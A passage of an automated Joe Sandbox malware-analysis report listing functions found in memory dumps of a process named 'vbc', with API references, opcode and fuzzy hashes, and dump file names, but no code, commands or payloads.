API String ID: 2030045667-0
Opcode ID: b61052834e2b947178f8619596108178d1b5d552d4a84b4e39925b62a9fd52da
Instruction ID: f42606c3e2b8a168d2cec193850d345621fee9d303a9d00f039e39417616b6f8
Opcode Fuzzy Hash: b61052834e2b947178f8619596108178d1b5d552d4a84b4e39925b62a9fd52da
Instruction Fuzzy Hash: 7021D3B6C013499FCB14CF9AD884ADEFBB5FB48310F10852EE559A7210C375A544CBA5

Function 09F693C0 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,00000000,00000000,?), ref: 09F6943D

Memory Dump Source

Source File: 00000009.00000002.4527528278.0000000009F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9f60000_vbc.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: fc09a2e4a3e6534edc7c3474ecc3f081821a8f04366976ccade91f7208fb50e5
Instruction ID: d7104564faf47ea4ae97a6a05be3e8809a3c485efe7f9ef32886591ec56e437a
Opcode Fuzzy Hash: fc09a2e4a3e6534edc7c3474ecc3f081821a8f04366976ccade91f7208fb50e5
Instruction Fuzzy Hash: 8321E2B6C013499FCB10CF9AD884ADEFBF5FB48310F10852EE519A7210C375A984CBA5

Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80

SysAllocString.OLEAUT32 ref: 00401898

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Function 0700B400 Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

(o]q, xrefs: 0700B589

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: (o]q
API String ID: 0-794736227
Opcode ID: 749bb2996aa2842511ade2d8e30a3d98ee615a04fc8b06f7023a00674f80acbc
Instruction ID: e1bdab9d139cf96604d3c7a2bd3f1aa6d772c7fa2ae6a33fbba81061877b23b1
Opcode Fuzzy Hash: 749bb2996aa2842511ade2d8e30a3d98ee615a04fc8b06f7023a00674f80acbc
Instruction Fuzzy Hash: 214122B2704204AFCB04AF69EC446AE7BF6AFC9620F544569E916D73D0DE349C41CBE1

Function 0700FD10 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

X }, xrefs: 0700FD4A

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: X }
API String ID: 0-4110221742
Opcode ID: 6b369a387882fb22890b42861bfee05d33c3d01d0dbf9deb79dd2174ff53528a
Instruction ID: 7f2f1bdb0fc720e18c6e7d20785a83b322a507b839316c060ad0fa8260810daa
Opcode Fuzzy Hash: 6b369a387882fb22890b42861bfee05d33c3d01d0dbf9deb79dd2174ff53528a
Instruction Fuzzy Hash: 6A215E70D0020A9FDB45DFA9D940A9EBFF6FF84300F40D569C01897296EB74AA86DB81

Function 070095AF Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

4']q, xrefs: 070095C9

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 99368aeddf6ea2483093166d7b153dd534659ecce83d541cd355ff7d546c37b5
Instruction ID: 01a1ac3906b935e20f0ae93cd3f79c1e7b992bfb10b41155c92c41374c92b68e
Opcode Fuzzy Hash: 99368aeddf6ea2483093166d7b153dd534659ecce83d541cd355ff7d546c37b5
Instruction Fuzzy Hash: 71E0DFB23180116BF629105F6840AAB668EC7C0671F150227F028C32C1DC06EC8043E1

Function 0700E564 Relevance: .7, Instructions: 651COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e49e9300d417a986f86842fc240b31304a6bc0fbc3a7900e748604893c93ee2
Instruction ID: ed506b0982c7b1f346f6f5fbc555bd8a7124e14d9cfe1d7423b4464579330acf
Opcode Fuzzy Hash: 4e49e9300d417a986f86842fc240b31304a6bc0fbc3a7900e748604893c93ee2
Instruction Fuzzy Hash: 4312993612B2829FD3C83B70B6AD17E7A71FB8F367B84FD41E05E904459B351088CA66

Function 0700E568 Relevance: .6, Instructions: 649COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2523853634a04c69ea1f5a8abe15b670f71aa1f3c4a0a8b84dcbffb01eb441e3
Instruction ID: 238fb757c90ac3f989f43e70118b17436929f90f8ccab1963ff701b9ea436c3d
Opcode Fuzzy Hash: 2523853634a04c69ea1f5a8abe15b670f71aa1f3c4a0a8b84dcbffb01eb441e3
Instruction Fuzzy Hash: 8812993612B2829FD3C83B70B6AD17E7A71FB8F367B84FD41E05E904459B351088CA66

Function 0700B5C8 Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8b6eb62a0cc406a1f9eb474b367660d4ed62d481d9ea58c490fcb5915c4acb1
Instruction ID: e74875802f0cf43ec98920b0ebc7ee0df6e8ebed670a38001ecde9981efc7210
Opcode Fuzzy Hash: c8b6eb62a0cc406a1f9eb474b367660d4ed62d481d9ea58c490fcb5915c4acb1
Instruction Fuzzy Hash: 51F109F5A00615DFDB04CF69D9849ADBBF6BF88320F1A8159E415AB3A1CB34EC41CB91

Function 07000890 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b67daf108e7237c454891ab8a98224031c93e6faf276111021186f22b0aa30e
Instruction ID: a22d18d4f8a3c5ec9a12a3df6ee6080c093064ab7d7b384533aa2fa0c3096b14
Opcode Fuzzy Hash: 1b67daf108e7237c454891ab8a98224031c93e6faf276111021186f22b0aa30e
Instruction Fuzzy Hash: 66B1F3747506008FD794DF39C998A297BE2FF89624B1581A9E51ACB3B2DB31EC41CB90

Function 07000881 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4072a054d258ac62e96c6ad69e7e8e7a43e9d5edcbb252153de2044878957f40
Instruction ID: 494f680008481b41ce399d2733a4ea0cb75ca49ed21523a28170168846633c6e
Opcode Fuzzy Hash: 4072a054d258ac62e96c6ad69e7e8e7a43e9d5edcbb252153de2044878957f40
Instruction Fuzzy Hash: 12A103747506008FD794DF29C988E297BE6FF89714B2185A8E50ACB3B2DB71EC41CB90

Function 070085F0 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e93049b042be374ce3583ce96891c0baa985f6a7e553588fde013fca924d757
Instruction ID: e24b977ba65443ff8ab0ead4ebc9643ef3d8e995a971acf99356fd7e235dd608
Opcode Fuzzy Hash: 6e93049b042be374ce3583ce96891c0baa985f6a7e553588fde013fca924d757
Instruction Fuzzy Hash: 137159B47002428FDB55CF29C898A6A77E5BF49360F1581A9E905CB3F1DB74DC81CB91

Function 0700DA90 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 869a2939034127b8330eee788a8ecd82682cb0b48746a58e16c62bb150cd0219
Instruction ID: 6e5c765aef1fdfa00de12379e84f27fdc3998c505f6226d0f535e256d2076a8c
Opcode Fuzzy Hash: 869a2939034127b8330eee788a8ecd82682cb0b48746a58e16c62bb150cd0219
Instruction Fuzzy Hash: 7051B475E01208DFDB44DFAAD98499DBBF2FF89310F24916AE419AB365DB30A841CF50

Function 070046A8 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab858e029639e868e4c11de96ef499c71d06fedd0aac572eceab27fdceb8d212
Instruction ID: 25ae10878c490822b8a317d3dd3e13178be991de77d9d1d5fdbd0b0a8b5c8625
Opcode Fuzzy Hash: ab858e029639e868e4c11de96ef499c71d06fedd0aac572eceab27fdceb8d212
Instruction Fuzzy Hash: C351A774E01208CFCB48DFA9D58499DBBF2FF89310F209169E809AB365DB35A945CF50

Function 0700A813 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d07c1cd4f29e95cbdf749f65e67ee5f8831225ef1ca29f6d38e18f08ac10253a
Instruction ID: d9c623186ad898902e55ce8c488365cbf0da39405b8db0f27c7893f9918a156b
Opcode Fuzzy Hash: d07c1cd4f29e95cbdf749f65e67ee5f8831225ef1ca29f6d38e18f08ac10253a
Instruction Fuzzy Hash: 0A4180B1B0434ADFEF11CFA8C844A9EBFB2AF49320F05C256E8559B295D334E955CB90

Function 07005B68 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d49ccbef6468443da38ef63f76c8d66de52385c0517bedb878ec62258cda5935
Instruction ID: dfcee84753abc51453a5261a47424d98af3044958078376660eaf9b7f6caf965
Opcode Fuzzy Hash: d49ccbef6468443da38ef63f76c8d66de52385c0517bedb878ec62258cda5935
Instruction Fuzzy Hash: 6A3190B530420AAFDB419F64EC48E6E7BA2EF88210F408018F9159B2D4CB75DD61DFA0

Function 0700B5B9 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c0bda6861b320b0d439d27e6b8fa211c82adc779953f61cc9b37cb3fe88c7bc
Instruction ID: 02a876569317a3d00965624013a375f78e37cf36f8044d8b1f8ffba2734e4940
Opcode Fuzzy Hash: 4c0bda6861b320b0d439d27e6b8fa211c82adc779953f61cc9b37cb3fe88c7bc
Instruction Fuzzy Hash: B8314BF5A006098FDB08DF69C8849AEBBF6FF85620B198255E415DB3E5CB34AC418BD1

Function 07008898 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b909a1cf78c7cddede34fd5eee2b6768ba260652d4d9751a07c3e2e0a3ff7658
Instruction ID: 25f3bab9ff603773b93601c90515c596f8d68d40a908dfb6dcf5902a29c23143
Opcode Fuzzy Hash: b909a1cf78c7cddede34fd5eee2b6768ba260652d4d9751a07c3e2e0a3ff7658
Instruction Fuzzy Hash: 0C21AFB13042039BEB653629885463E71C7BFCA624F1CC239D556CB3D4EE6AD84293D2

Function 07008888 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7227f37255c3b97220c522d29255b8769019b0ba346b197c13bb9249040e4894
Instruction ID: 23e9a6087822bfc5581cedd8f260a129f5700dc3d781a4f64871fd8b3ef8cc2b
Opcode Fuzzy Hash: 7227f37255c3b97220c522d29255b8769019b0ba346b197c13bb9249040e4894
Instruction Fuzzy Hash: 20218E713042138BEB667B25849813C76D6BF85628F1CC239D546CB2D5EF29D84297C2

Function 07002E08 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a4f6fa80dfebf0734e1aec7422416e09c9edae925790a36375d1a8dd87954e5
Instruction ID: 872ffd1e2ab4d70535469e19d27e1bdb806c3f10fe224e5edad8659c0c62b480
Opcode Fuzzy Hash: 0a4f6fa80dfebf0734e1aec7422416e09c9edae925790a36375d1a8dd87954e5
Instruction Fuzzy Hash: AB21B075A001469FDB64CF64C8449AE37A5FF89268F10C129D8199B380DB30EA46CBD2

Function 06F6D664 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4512734218.0000000006F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f6d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1625e53e6a68e844c8fa3d3934e1375c24068b2d2bad0618e8c89fcb32fc912e
Instruction ID: 683f67dbaad5556e217484939b93b9b56097b7d45b090292d1288a9249d3c6f0
Opcode Fuzzy Hash: 1625e53e6a68e844c8fa3d3934e1375c24068b2d2bad0618e8c89fcb32fc912e
Instruction Fuzzy Hash: 1C2164B2A00244DFDB05CF14C9C0F26BF65FF88314F24C169E8094B256C33AD416CBA2

Function 07006810 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dad36834e019ca86a341b568381dad62dacb81e6605c600768763287253cb93
Instruction ID: a2dadccc5c1ae566d26ad84411060d3d80b99b7719e8f83a9ae85d1e154c53bf
Opcode Fuzzy Hash: 1dad36834e019ca86a341b568381dad62dacb81e6605c600768763287253cb93
Instruction Fuzzy Hash: 7D21D1B5B00A12EBD3199A25D85892EB393FF8A721B44426CD81ADB3C4CF36DC0287D0

Function 06F7D118 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4512854840.0000000006F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f7d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf4998f1de7fa54286dfe269d0f6d5c94d2d7afc2ea789a9e2e07c883d418261
Instruction ID: 3034b7d3533dd1a23a68ff870d5b61264017c37000bd855fb73bef9bab887d2f
Opcode Fuzzy Hash: cf4998f1de7fa54286dfe269d0f6d5c94d2d7afc2ea789a9e2e07c883d418261
Instruction Fuzzy Hash: 7E210471A04244DFEB45DF14D9C0B26BBA5FF88314F60C56EE8094B356C3BAD846CAA1

Function 07009B80 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 095ad2db3be4a40748d71d0f4c9c10ab26afd49e0557e7deb1002a3585e67c25
Instruction ID: 54f2954a3c19aec50fe96ce210a467cb6be25e2986c8f2c02135dbe75ebf2b42
Opcode Fuzzy Hash: 095ad2db3be4a40748d71d0f4c9c10ab26afd49e0557e7deb1002a3585e67c25
Instruction Fuzzy Hash: 3D216DB0A54219EBEB14DFA1DA48BAEBBF5FF45310F10412DE401AB291DB75A981CF90

Function 07004790 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc66a4169d5d0bc6902f54ba2a20760960f0358889e438c587c4e98359a32b95
Instruction ID: e955b3665b5e606cc40697a9ed212366f1c5e335e1c447f0c9709e4286c8f614
Opcode Fuzzy Hash: cc66a4169d5d0bc6902f54ba2a20760960f0358889e438c587c4e98359a32b95
Instruction Fuzzy Hash: B931B478E11309DFCB44DFA8E59489DBBB2FF49314B209469E809AB365DB35AD41CF40

Function 07005B66 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c2c1af7508b0714b53c81c0131b979ed1edffd9ca852554a54a493d86043794
Instruction ID: 97ae11459f5c6ad38c4de97e1cceeb5c5d24965a6325b7b893b37f57b93cba5f
Opcode Fuzzy Hash: 1c2c1af7508b0714b53c81c0131b979ed1edffd9ca852554a54a493d86043794
Instruction Fuzzy Hash: A321C3B1204259AFDB449F64EC08A6A3BA5EB59320F408028F8059B2C4CB74DDA5CBE0

Function 07009B70 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d74e00c2297d4360ef2eefc3eb7dee742f868024731d9ca63e0bb7344054a4c
Instruction ID: 04abde2d3f384414bf6005038b82966c70a5bda11bb8d10c742a65c0bec4b7cc
Opcode Fuzzy Hash: 8d74e00c2297d4360ef2eefc3eb7dee742f868024731d9ca63e0bb7344054a4c
Instruction Fuzzy Hash: 041106F0A142199BEB14DFA5DA44BADBBB5EF45320F10422DE401A73D5DB31A841CF80

Function 06F6D65F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4512734218.0000000006F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f6d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
Instruction ID: 9cb854e3d526adce899575138ba4196322737fd1348440fad8438e2274145843
Opcode Fuzzy Hash: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
Instruction Fuzzy Hash: 1C11E676904280CFCB16CF10D9C4B16BF71FF88314F24C6A9E9494B656C336D45ACBA2

Function 07002D08 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f94770f77fa23ee8a063b292d2d94429de7911463017b6c30944845dff98ed32
Instruction ID: 8d5d208e6c85f3aa425ddbb9f69344dbbd8214831460cc956f4eff185730b668
Opcode Fuzzy Hash: f94770f77fa23ee8a063b292d2d94429de7911463017b6c30944845dff98ed32
Instruction Fuzzy Hash: 2C21C2B4D15609DFCB00DFA8C9455EDBFF4BF09310F10416AD819B6294EB345A85CFA1

Function 06F7D113 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4512854840.0000000006F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f7d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c5635bf6bf0a90c65c6f78b78781ef727195c12e75a23b42f627594c6f222ba
Instruction ID: 3d51c866a23891ff3e60395d4baa2b17dc7f12bb17aa132cd540d7ca1e590f2a
Opcode Fuzzy Hash: 2c5635bf6bf0a90c65c6f78b78781ef727195c12e75a23b42f627594c6f222ba
Instruction Fuzzy Hash: A9119D75904280DFEB06CF14D9C4B15BFB1FF84314F24C6AAD8494B656C37AD44ACB62

Function 070063A7 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c54fef8c8aba841d96c3ac8df334f6beeb42d8b32088b81bedd4aa774c30cba0
Instruction ID: a0612bf4c5199bb084b454a1172a122dd303851694f389c99917807c1afc278d
Opcode Fuzzy Hash: c54fef8c8aba841d96c3ac8df334f6beeb42d8b32088b81bedd4aa774c30cba0
Instruction Fuzzy Hash: 7201B9727005157FDB559E69A800A9E7BABDBC8260F14802AF515DB6C4CA72D8128BD0

Function 06F6D005 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4512734218.0000000006F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f6d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 520cbe9370650686455d41456bda64876f47991611695a1d11222149282f8048
Instruction ID: 595c5d91ab9e6323767224e2361e4c5c031c0bdca57de0a0ca24cc18fa5b12a4
Opcode Fuzzy Hash: 520cbe9370650686455d41456bda64876f47991611695a1d11222149282f8048
Instruction Fuzzy Hash: ED01927180E3C0AFD7524B268C84752BFB8EF43220F1985DBE8848F197C2695C45CB71

Function 0700EE40 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bab62bb5d6e1832672921c728a90eb28648eaf96694bf44905024b5090acb5e5
Instruction ID: d69759ec338e4894160e9c3d600336b8027cc4b743653bfbbecc0ea7a1fdb733
Opcode Fuzzy Hash: bab62bb5d6e1832672921c728a90eb28648eaf96694bf44905024b5090acb5e5
Instruction Fuzzy Hash: 8111AD74D04209EFDB01CFA8D8449AEBFB1FF49314F004069D418A73A2D7306A81CF91

Function 06F6D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4512734218.0000000006F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f6d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: addca0e0c206ed6126a00d378b39acee962b3136aeb43a498bd6904db95fb1d0
Instruction ID: bbbc5e51b721af295aa24c71386b695434fbda765245eace3bb00ea28667702c
Opcode Fuzzy Hash: addca0e0c206ed6126a00d378b39acee962b3136aeb43a498bd6904db95fb1d0
Instruction Fuzzy Hash: 9701A771A05344BEE7608A16C984B67BF9CEF86324F18C52AFD494A24AC2799845CAB1

Function 07002DC8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1457529b8386d0099e556d78b4fddbdf62ea2e20fd6d269e0bbb94da1cdb801a
Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
Opcode Fuzzy Hash: 1457529b8386d0099e556d78b4fddbdf62ea2e20fd6d269e0bbb94da1cdb801a
Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1

Function 0700B4BD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5452fe2b5d32235b7a5a757883d1d6061de2f0e72dd775b52a458d6b4410d64a
Instruction ID: ab44ee08dd126e9f06f47cbf554769e72a4dff285505173539fc64f546e45b2e
Opcode Fuzzy Hash: 5452fe2b5d32235b7a5a757883d1d6061de2f0e72dd775b52a458d6b4410d64a
Instruction Fuzzy Hash: E4D0673AB41018AFCB049F98E8408DEBBB6FB9C221B458116E925A3265CA319961DB50

Function 0700DC1F Relevance: .0, Instructions: 16COMMON

Download Yara Rule

